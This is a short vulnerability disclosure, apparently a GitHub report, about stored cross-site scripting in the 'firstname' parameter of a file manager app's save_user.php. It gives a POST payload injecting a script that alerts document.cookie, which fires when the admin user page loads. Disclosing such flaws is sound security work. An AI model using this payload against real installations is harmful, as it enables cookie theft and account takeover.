Skip to content
Permalink
main
Switch branches/tags

Name already in use

A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?
Go to file
 
 
Cannot retrieve contributors at this time

BUG_Author: HaolunSong

Vulnerability File: /file_manager/admin/save_user.php

Parameter "firstname" (POST), exists stored cross-site scripting vulnerability

Payload:status=normal&emplnumber=2&firstname=<script>alert(document.cookie)</script>&lastname=3&region=zanzibar

image

Payload will trigger when a user visits on http://localhost/file_manager/admin/admin_user.php

image